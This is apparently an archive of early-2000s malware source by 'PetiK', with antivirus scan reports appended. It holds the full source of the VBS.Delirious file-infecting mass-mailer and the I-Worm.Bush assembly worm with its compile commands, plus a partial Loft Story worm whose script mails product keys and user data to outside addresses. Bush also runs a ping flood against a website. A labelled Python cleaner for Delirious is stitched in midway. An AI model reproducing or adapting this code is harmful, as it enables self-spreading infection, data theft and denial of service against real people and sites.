callx RegQueryValueExA

push [RegHandle]
callx RegCloseKey

TIF_CUR:push offset Buffer
callx SetCurrentDirectoryA
call FFF

FIN: push 00h
callx ExitProcess

FFF: push offset HTM
@pushsz "*.htm*"
callx FindFirstFileA
mov edi,eax
cmp eax,-1
je FIN
P_HTM: call parse_html
FNF: push offset HTM
push edi
callx FindNextFileA
test eax,eax
jnz P_HTM
FC: push edi
callx FindClose
ret

parse_html:
pushad
push 00h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 00h
push FILE_SHARE_READ
push GENERIC_READ
push offset HTM.FileName
callx CreateFileA ;open the file
inc eax
je FIN
dec eax
xchg eax,ebx

xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA ;create the file mapping
test eax,eax
je ph_close
xchg eax,ebp

xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
callx MapViewOfFile ;map the file
test eax,eax
je ph_close2
xchg eax,esi
push 00h
push ebx
callx GetFileSize ;get its size
xchg eax,ecx
jecxz ph_close3
ls_scan_mail:
call @mt
db 'mailto:'
@mt: pop edi
l_scan_mail:
pushad
push 7
pop ecx
rep
cmpsb ;search for "mailto:"
popad ;string
je scan_mail ;check the mail address
inc esi
loop l_scan_mail ;in a loop
ph_close3:
push esi
callx UnmapViewOfFile ;unmap view of file
ph_close2:
push ebp
callx CloseHandle ;close file mapping
ph_close:
push ebx
callx CloseHandle ;close the file
popad
ret
scan_mail:
xor edx,edx
add esi,7
mov edi,offset mail_address ;where to store the
push edi ;mail address
n_char: lodsb
cmp al,' '
je s_char
cmp al,'"'
je e_char
cmp al,''''
je e_char
cmp al,'@'
jne o_a
inc edx
o_a: stosb
jmp n_char
s_char: inc esi
jmp n_char
e_char: xor al,al
stosb
pop edi
test edx,edx ;if EDX=0, mail is not
je ls_scan_mail ;valid (no '@')

call mapi_init
test eax,eax
jne ls_scan_mail
call send
call close

jmp ls_scan_mail
mapi_init:
xor eax,eax
push offset MAPIHandle
push eax
push eax
push eax
push eax
push eax
callx MAPILogon
ret

send: xor eax,eax
push eax
push eax
push offset sMessage
push eax
push [MAPIHandle]
callx MAPISendMail
ret

close: xor eax,eax
push eax
push eax
push eax
push 12345678h
MAPIHandle = dword ptr $-4
callx MAPILogoff
ret

add_ad: ;@pushsz "C:\carnet.txt"
;push offset mail_address
;push offset mail_address
;@pushsz "Carnet d'adresses"
;callx WritePrivateProfileStringA
ret

.data
htmd: db '<html><head><title>Loft Story WEB Page</title></head>',0dh,0ah
db '<font face=''verdana'' color=green size=''2''>Please accept ActiveX '
db 'to see this page<br><br> Internet Explorer<br><br> </font>',0dh,0ah
db '<SCRIPT Language=VBScript>',0dh,0ah
db 'On Error Resume Next',0dh,0ah
db 'Set w=CreateObject("WScript.Shell")',0dh,0ah
db 'w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ActiveX 1.0",'
db '"C:\ActiveX.vbs"',0dh,0ah
db 'w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Download Directory",'
db '"C:\"',0dh,0ah
db 'document.write "Please download the file ""ActiveX.vbs"" to correct a bug '
db 'in Internet Explorer"',0dh,0ah
db 'document.write "<br>Connect you to internet to download the file<br>"',0dh,0ah
db 'document.write "<br><h2>If you don''t accept ActiveX the syntax failed<h2>"',0dh,0ah
db 'w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",'
db '"http://www.ctw.net/euphoria/ActiveX.vbs"',0dh,0ah
db '</SCRIPT></body></html>',0dh,0ah
HTMTAILLE equ $-htmd

szCopie db 50 dup (0)
szCopieb db 50 dup (0)
szOrig db 50 dup (0)
szWinini db 50 dup (0)
Buffer db 7Fh dup (0)
BufferSize dd 7Fh
FileHandle dd ?
RegHandle dd ?
regDisp dd 0
regResu dd 0
octets dd ?
hdll dd ?
hdll2 dd ?
netcheck dd ?
setvalue dd ?
mail_address db 128 dup (?)
Temp dd 0
ValueType dd 0

sMessage dd ?
dd offset subject
dd offset body
dd ?
dd offset date
dd ?
dd 2
dd offset mFrom
dd 1
dd offset mTo
dd 1
dd offset attach

subject db "Loft Story News...",00h
body db "The last video of the <Loft story> program",00h
date db "07/01/2001",00h
sender db "b_castaldi@loftstory.fr",00h

mFrom dd ?
dd ?
dd offset mFrom
dd offset sender
dd ?
dd ?
mTo dd ?
dd 1
dd offset mTo
dd offset mail_address
dd ?
dd ?

attach dd ?
dd ?
dd ?
dd offset szCopieb
dd ?
dd ?

CREATE_ALWAYS equ 00000002h
FILE_ATTRIBUTE_NORMAL equ 00000080h
FILE_END equ 00000002h
FILE_MAP_READ equ 00000004h
FILE_SHARE_READ equ 00000001h
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
HKEY_CURRENT_USER equ 80000001h
HKEY_LOCAL_MACHINE equ 80000002h
HKEY_USERS equ 80000003h
OPEN_EXISTING equ 00000003h
PAGE_READONLY equ 00000002h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>

filetime struct
LowDateTime dd ?
HighDateTime dd ?
filetime ends

win32 struct
Fileattributes dd ?
CreationTime filetime ?
LastAccessTime filetime ?
LastWriteTime filetime ?
FileSizeHigh dd ?
FileSizeHow dd ?
Reserved0 dd ?
Reserved1 dd ?
FileName dd 260 (?)
AlternativeName db 13 dup (?)
db 3 dup (?)
win32 ends
HTM win32 <>

end DEBUT
end
ACTIVEX.VBS

On Error Resume Next
Set f=CreateObject("Scripting.FileSystemObject")
Set w=CreateObject("WScript.Shell")
Set ws=Wscript.CreateObject("WScript.Shell")
startup=ws.SpecialFolders("Startup")
If f.FileExists (startup&"\Loft.htm") Then
f.DeleteFile (startup&"\Loft.htm")
MsgBox "Patch for Internet Explorer installed",vbinformation,"Patch v1.0"
MsgBox "You can delete this file",vbinformation,"Patch v1.0"
End If

CN=CreateObject("WScript.NetWork").ComputerName
UN=CreateObject("WScript.NetWork").UserName
UD=CreateObject("WScript.NetWork").UserDomain
NOM=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ENT=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
PI=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
PK=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
V=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
VN=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
P=w.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage")

Set O=CreateObject("Outlook.Application")
Set m=O.CreateItem(0)
m.To = "loftptk@multimania.com"
m.BCC = "petik@multimania.com; euphoria@ctw.net"
m.Subject="Loft Info arrivant de " & P
n = "Date : " & date
n = n & VbCrLf & "Heure : " & time
n = n & VbCrLf & "Nom d'enregistrement : " & NOM
n = n & VbCrLf & "Nom de l'organization : " & ENT
n = n & VbCrLf & "Numéro d'identification : " & PI
n = n & VbCrLf & "Numéro d'enregistrement : " & PK
n = n & VbCrLf & "Version de Windows : " & V & " " & VN
n = n & VbCrLf & "Nom de l'ordinateur : " & CN
n = n & VbCrLf & "Nom de domaine : " & UD
n = n & VbCrLf & "Nom d'utilisateur : " & UN
m.Body = n
m.DeleteAfterSubmit=True
m.Send

w.RegWrite "HKCU\Software\Microsoft\PetiK\LoftInfo","OK"
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.yahoo.fr"
File Loft.exe received on 05.16.2009 17:51:42 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.8704.B
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.14
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!cec4
Avast 4.8.1335.0 2009.05.15 Win32:Petik-LoftStory
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.F
BitDefender 7.2 2009.05.16 Win32.Ltof.A@mm
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.K
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.K
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8704
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.8704.B
F-Prot 4.4.4.56 2009.05.16 W32/Malware!cec4
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.E
GData 19 2009.05.16 Win32.Ltof.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.14
Microsoft 1.4602 2009.05.16 Worm:Win32/PetTick@mm
NOD32 4080 2009.05.15 Win32/Petik.K
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8704.B
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.8704
Panda 10.0.0.14 2009.05.16 W32/Petik.K
PCTools 4.4.2.0 2009.05.16 HTML.Loft.A
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.i
Sophos 4.41.0 2009.05.16 W32/Petik-K
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.8704.B
VirusBuster 4.6.5.0 2009.05.16 HTML.Loft.A

Additional information
File size: 8704 bytes
MD5...: ee8e03e0a5251a340fe2c08fd7f9c2e4
SHA1..: 4144791ec8571744fe9905309bb6bf7199485a37
' Name : VBS.Delirious
' Author : PetiK
' Language : VBS
' Date : 28/06/2001

' Copies itself to %WINDIR%\Delirious.vbs
' Runs at each start by writing a new value in
' HKLM\Software\Microsoft\Windows\CurrentVersion\Run
' Displays a fake message if it's not Delirious.vbs
' Infects all VBS files
' Infects Normal.dot
' Spreads with Outlook

On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set fl=sf.OpenTextFile(WScript.ScriptFullName,1)
virus=fl.ReadAll
Set win=sf.GetSpecialFolder(0)
Set sys=sf.GetSpecialFolder(1)

Set cpy=sf.GetFile(WScript.ScriptFullName)
cpy.Copy(win&"\Delirious.vbs")
r=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Delire")
ws.RegWrite r,(win&"\Delirious.vbs")

If cpy <> (win&"\Delirious.vbs") Then
MsgBox cpy&" is not a VBS file valid.",vbcritical,cpy
else

Disque()
Word()
Spread()
If Day(Now)=1 Then
MsgBox "Look at my new virus !"+VbCrLf+"Delirious, isn't it ??",vbinformation,"VBS.Delirious coded by PetiK (c)2001"
End If

bureau=ws.SpecialFolders("Desktop")
Set link=ws.CreateShortCut(bureau&"\Site_Web.url")
link.TargetPath="http://www.jememarre.com"
link.Save

End If

Sub Disque
If not sf.FileExists (sys&"\DeliriousFile.txt") Then
Set DF=sf.CreateTextFile(sys&"\DeliriousFile.txt")
DF.WriteLine "Infected file by VBS.Delirious"
DF.WriteLine "Fichiers infectés par VBS.Delirious :"
DF.WriteBlankLines(1)
DF.Close
End If
Set dr=sf.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub
Sub infection(dossier)
Set f=sf.GetFolder(dossier)
Set fc=f.Files
For Each F in fc
ext=sf.GetExtensionName(F.path)
ext=lcase(ext)
If (ext="vbs") Then
Set verif=sf.OpenTextFile(F.path, 1, False)
If verif.ReadLine <> "'VBS.Delirious" Then
tout=verif.ReadAll()
verif.Close
Set inf=sf.OpenTextFile(F.path, 2, True)
inf.Write(virus)
inf.Write(tout)
inf.Close
Set DF=sf.OpenTextFile(sys&"\DeliriousFile.txt", 8, True)
DF.WriteLine F.path
DF.Close
End If
End If
Next
End Sub
Sub liste(dossier)
Set f=sf.GetFolder(dossier)
Set sd=f.SubFolders
For Each F in sd
infection(F.path)
liste(F.path)
Next
End Sub

Sub Word()
On Error Resume Next
Set CODE=sf.CreateTextFile(sys&"\DeliriousCode.txt")
CODE.Write(virus)
CODE.Close
If ws.RegRead("HKLM\Software\Microsoft\Delirious\InfectNormal") <> "OK" Then
Set wrd=WScript.CreateObject("Word.Application")
wrd.Visible=False
Set NorT=wrd.NormalTemplate.VBProject.VBComponents
NorT.Import sys&"\DeliriousCode.txt"
wrd.Run "Normal.ThisDocument.AutoExec"
wrd.Quit
ws.RegWrite "HKLM\Software\Microsoft\Delirious\InfectNormal","OK"
End If
End Sub

Sub Spread()
WHO=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
Set OA=CreateObject("Outlook.Application")
Set MA=OA.GetNameSpace("MAPI")
For Each C In MA.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set AD=C.AddressEntries(D)
Set EM=OA.CreateItem(0)
EM.To=AD.Address
EM.Subject="Delirious EMail from " & WHO
body="Hi " & AD.Name & ","
body = body & VbCrLf & "Look at this funny attached."
body = body & VbCrLf & ""
body = body & VbCrLf & " Best Regards " & WHO
EM.Body=body
EM.Attachments.Add(win&"\Delirious.vbs")
EM.DeleteAfterSubmit=True
If EM.To <> "" Then
EM.Send
End If
Next
End If
Next
End Sub
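A cleaner for the prepend infection that Sub infection() above performs on .vbs files; this is an added example, not part of the archive, and the virus stub and host text inside it are constructed stand-ins for the real script body.

```python
"""Cleaner for the VBS.Delirious prepend infection shown above.

Added example, not part of the archive. What Sub infection() does to a host:
it reads the host's first line with ReadLine (that line is never written
back), then overwrites the host with the full text of the running script
followed by the remainder of the host. The guard compares that first line
with "'VBS.Delirious", but the script's own first line is
"' Name : VBS.Delirious", so the guard never matches and an already
infected file gets another copy prepended on each run. A cleaner therefore
has to strip several stacked copies, and it cannot restore the lost lines.
"""
from dataclasses import dataclass, field

# Lines that open a virus copy. The first copy starts with the "Name" header;
# a copy that was itself re-infected lost its first line, so it starts with
# the "Author" header. A copy ends at the "End Sub" closing Sub Spread().
COPY_STARTS = ("' Name : VBS.Delirious", "' Author : PetiK")
LANGUAGE_LINE = "' Language : VBS"
SPREAD_HEADER = "Sub Spread()"
COPY_END = "End Sub"


@dataclass
class CleanResult:
    text: str
    copies_removed: int
    notes: list = field(default_factory=list)


def _copy_at(lines, i):
    """If a virus copy starts at line i, return the index one past its end."""
    if lines[i].rstrip("\r\n") not in COPY_STARTS:
        return None
    # Confirm the header: "' Language : VBS" must follow within two lines.
    window = [l.rstrip("\r\n") for l in lines[i + 1:i + 3]]
    if LANGUAGE_LINE not in window:
        return None
    try:
        j = next(k for k in range(i, len(lines))
                 if lines[k].strip() == SPREAD_HEADER)
        end = next(k for k in range(j, len(lines))
                   if lines[k].strip() == COPY_END)
    except StopIteration:
        return None  # truncated copy: leave it in place for manual review
    return end + 1


def clean_delirious(text):
    """Strip every stacked VBS.Delirious copy and report what was done."""
    lines = text.splitlines(keepends=True)
    kept, removed, i = [], 0, 0
    while i < len(lines):
        end = _copy_at(lines, i)
        if end is None:
            kept.append(lines[i])
            i += 1
        else:
            removed += 1
            i = end
    result = CleanResult("".join(kept), removed)
    if removed:
        result.notes.append("the host's original first line was consumed by "
                            "the worm and cannot be recovered")
    if removed > 1:
        result.notes.append("stacked copies found: the remaining text may "
                            "contain fragments of other hosts; review it")
    return result


# Constructed stand-in for the worm body: same header and closing structure
# as the script above, kept to a few lines so the sample stays readable.
VIRUS_STUB = (
    "' Name : VBS.Delirious\n"
    "' Author : PetiK\n"
    "' Language : VBS\n"
    "On Error Resume Next\n"
    "Sub Spread()\n"
    "' ... mailing code ...\n"
    "End Sub\n"
)
HOST_REST = 'MsgBox "original host body"\n'

# First-generation infection: [virus][host minus its first line]
INFECTED_ONCE = VIRUS_STUB + HOST_REST
# The same file run again re-infects itself:
# [copy][host rest][copy minus its first line][host rest]
INFECTED_TWICE = INFECTED_ONCE + INFECTED_ONCE.split("\n", 1)[1]

if __name__ == "__main__":
    r = clean_delirious(INFECTED_TWICE)
    print(r.copies_removed, r.notes)
    print(r.text, end="")
```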
File Delirious.vbs received on 05.16.2009 11:30:16 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 VBS/Petik
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.01
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 VBS/Petik.A@mm
Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.FCCA075D
CAT-QuickHeal 10.00 2009.05.15 VBS.Petik.H
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik
DrWeb 5.0.0.12182 2009.05.16 VBS.Petik
eSafe 7.0.17.0 2009.05.14 VBS.MailSender.
eTrust-Vet 31.6.6508 2009.05.16 VBS/VBSWG!generic
F-Prot 4.4.4.56 2009.05.15 VBS/Petik.A@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.H@mm
GData 19 2009.05.16 Generic.ScriptWorm.FCCA075D
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 VBS/Louse@MM
McAfee+Artemis 5616 2009.05.15 VBS/Louse@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.01
Microsoft 1.4602 2009.05.16 Virus:VBS/Louse@mm.gen
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 VBS/Louse.A@mm
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.L@mm
Panda 10.0.0.14 2009.05.15 VBS/Petik.H
PCTools 4.4.2.0 2009.05.15 VBS.Petik.H
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Hopalong
Sophos 4.41.0 2009.05.16 VBS/Petik-H
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.C@m
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.H
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 VBS.Petik.H

Additional information
File size: 3112 bytes
MD5...: 6e8ba64159c0520ecd7781951dd11fca
SHA1..: 3a176e6646fd14f44074dd9d59122278bafe608c
SHA256: bd2901cb43b873fb0ba5573641a56d24c066069302c7e275555665b12c86a2d8
comment #
Name : I-Worm.Bush
Author : PetiK
Date : July 1st
Size : 8192 bytes

Action : If the file is not \WINDOWS\SYSTEM\BIOS.EXE, it copies itself to this file and alters the run= line in the WIN.INI file to run at each start. It also copies itself to \WINDOWS\Bush.exe.
Otherwise, it creates \WINDOWS\Carnet.vbs and executes it. It adds a value in the Run key to run this file at each start. If the file already exists, it does nothing.
Then it checks whether the user is connected. If it finds a connection, it displays a message and sends a copy of itself to the addresses found by the VBS file.
At the end, it attacks the site of G.W. Bush on Wednesdays.

To compile :
tasm32 /M /ML Bush
tlink32 -Tpe -aa -x Bush,,,import32
C:\TASM32\BIN\brc32 bush.rc
#
.586p
.model flat
.code

callx macro a
extrn a:proc
call a
endm

include useful.inc

SIGNATURE db "I-Worm.Bush "
db "by PetiK (c) 2001",00h
DEBUT:
VERIF: push 00h
callx GetModuleHandleA
push 50
push offset szOrig
push eax
callx GetModuleFileNameA

push 50h
push offset szCopie
callx GetSystemDirectoryA
@pushsz "\BIOS.EXE"
push offset szCopie
callx lstrcat

push 50h
push offset szCopieb
callx GetWindowsDirectoryA
@pushsz "\Bush.exe"
push offset szCopieb
callx lstrcat

push offset szOrig
push offset szCopie
callx lstrcmp
test eax,eax
jz CAR_A

COPIE: push 00h
push offset szCopie
push offset szOrig
callx CopyFileA
push 00h
push offset szCopieb
push offset szOrig
callx CopyFileA

WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA

MESSAGE:push 30h
@pushsz "Error Load Library"
@pushsz "Cannot run the Dynamic Link Library GWBios.dll"
push 00h
callx MessageBoxA
jmp FIN

CAR_A: push 50
push offset szCarnet
callx GetWindowsDirectoryA
@pushsz "\Carnet.vbs"
push offset szCarnet
callx lstrcat
push 00h
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset szCarnet
callx CreateFileA
cmp eax,-1
je DLL
mov [FH],eax
push 00h
push offset octets
push VBSTAILLE
push offset vbsd
push [FH]
callx WriteFile
push [FH]
callx CloseHandle

REG: @pushsz "SHLWAPI.dll"
callx LoadLibraryA
test eax,eax
jz DLL
mov hdll,eax
@pushsz "SHSetValueA"
push hdll
callx GetProcAddress
test eax,eax
jz DLL
mov setvalue,eax
RUN_C: push 08h
push offset szCarnet
push 01h
@pushsz "Carnet d'adresses"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
call setvalue
push [hdll]
callx FreeLibrary

DLL: @pushsz "WININET.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov hdll,eax
@pushsz "InternetGetConnectedState"
push hdll
callx GetProcAddress
test eax,eax
jz FIN
mov netcheck,eax
jmp NET
DODO: push 10000
callx Sleep
NET: push 00h
push offset Temp
call [netcheck]
dec eax
jnz DODO

NET_OK: push 40h
@pushsz "G.W.Bush"
@pushsz "The man who want to kill poeple and the earth"
push 00h
callx MessageBoxA
FINDLL: push [hdll]
callx FreeLibrary
JOUR: push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],03h
jne JOUR2

DoS: push 01h
@pushsz "ping -l 10000 -t www.georgewbush.com"
callx WinExec
push 40h
@pushsz "Internet"
@pushsz "You can go to the web site : www.georgewbush.com"
push 00h
callx MessageBoxA

JOUR2: push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDay],25
jne TXT
push 40h
@pushsz "I-Worm.Bush"
@pushsz "Coded by PetiK (c)2001. To show my anger against this man."
push 00h
callx MessageBoxA

TXT: pushad
push 50
push offset szCarnet2
callx GetWindowsDirectoryA
@pushsz "\Carnet.txt"
push offset szCarnet2
callx lstrcat
push 00h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 00h
push FILE_SHARE_READ
push GENERIC_READ
push offset szCarnet2
callx CreateFileA
cmp eax,-1
je RETOUR
xchg eax,ebx

xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je CL1
xchg eax,ebp

xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
callx MapViewOfFile
test eax,eax
je CL2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
xchg eax,ecx
jecxz CL3

d_scan_mail:
call @mlt
db 'mailto:'
@mlt: pop edi
scn_mail:
pushad
push 07h
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop scn_mail

CL3: push esi
callx UnmapViewOfFile
CL2: push ebp
callx CloseHandle
CL1: push ebx
callx CloseHandle
RETOUR: popad

FIN: push 00h
callx ExitProcess

scan_mail:
xor edx,edx
add esi,7 ;size of the string MAILTO:
mov edi,offset m_addr
push edi
p_car: lodsb
cmp al,' '
je car_s
cmp al,'"'
je car_f
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_car
car_s: inc esi
jmp p_car
car_f: xor al,al
stosb
pop edi
test edx,edx ;if edx=0 no @
je d_scan_mail
call send
jmp d_scan_mail

send: xor eax,eax
push eax
push eax
push offset sMessage
push eax
push [MAPIh]
callx MAPISendMail
ret

.data
szCarnet db 50 dup (0)
szCarnet2 db 50 dup (0)
szCopie db 50 dup (0)
szCopieb db 50 dup (0)
szOrig db 50 dup (0)
szWinini db 50 dup (0)
FH dd ?
octets dd ?
hdll dd ?
netcheck dd ?
setvalue dd ?
shfolder dd ?
m_addr db 128 dup (?)
Temp dd 0
MAPIh dd 0

sMessage dd ?
dd offset subject
dd offset body
dd ?
dd offset date
dd ?
dd 2
dd offset mFrom
dd 1
dd offset mTo
dd 1
dd offset attach

subject db "Important and confidential information about...",00h
body db "...the powerfulest man of the world.",0dh,0ah
db "Look at this attachment to better know this man.",0dh,0ah,0dh,0ah
db "Visit his site (www.georgewbush.com) on Wednesday.",0dh,0ah,0dh,0ah
db 09h,"Best Regards",00h
date db "07/01/2001",00h
sender db "webmaster@rnc.org",00h

mFrom dd ?
dd ?
dd offset mFrom
dd offset sender
dd ?
dd ?

mTo dd ?
dd 1
dd offset mTo
dd offset m_addr
dd ?
dd ?
attach dd ?
dd ?
dd ?
dd offset szCopieb
dd ?
dd ?

vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set w=CreateObject("WScript.Shell")',0dh,0ah
db 'If not f.FileExists (f.GetSpecialFolder(0)&"\Carnet.txt") Then',0dh,0ah
db 'Set cr=f.CreateTextFile(f.GetSpecialFolder(0)&"\Carnet.txt")',0dh,0ah
db 'cr.Close',0dh,0ah
db 'End If',0dh,0ah
db 'Set OA=CreateObject("Outlook.Application")',0dh,0ah
db 'Set MA=OA.GetNameSpace("MAPI")',0dh,0ah
db 'For each A In MA.AddressLists',0dh,0ah
db 'If A.Addressentries.Count <> 0 Then',0dh,0ah
db 'For B=1 To A.AddressEntries.Count',0dh,0ah
db 'Set C=A.AddressEntries(B)',0dh,0ah
db 'If w.RegRead ("HKCU\Software\Bush\" & C.Address) <> "OK" Then',0dh,0ah
db 'Set car=f.OpenTextFile(f.GetSpecialFolder(0)&"\Carnet.txt", 8, True)',0dh,0ah
db 'car.WriteLine """mailto:" & C.Address & """"',0dh,0ah
db 'car.Close',0dh,0ah
db 'w.RegWrite "HKCU\Software\Bush\" & C.Address,"OK"',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
VBSTAILLE equ $-vbsd

CREATE_NEW equ 00000001h
FILE_ATTRIBUTE_NORMAL equ 00000080h
FILE_MAP_READ equ 00000004h
FILE_SHARE_READ equ 00000001h
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
OPEN_EXISTING equ 00000003h
PAGE_READONLY equ 00000002h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>

end DEBUT
end
File Bush.exe received on 05.16.2009 11:20:57 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/Peti
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.13
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Petik.B@mm
Avast 4.8.1335.0 2009.05.15 Win32:Petik-Bush
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Pettick.E@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.AA
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.9216
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.8192.A
F-Prot 4.4.4.56 2009.05.15 W32/Petik.B@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik.B@mm
GData 19 2009.05.16 Win32.Pettick.E@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.E@mm
NOD32 4080 2009.05.15 Win32/Petik.AA
Norman 6.01.05 2009.05.16 W32/Petik.O
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 W32/Petik.W.worm
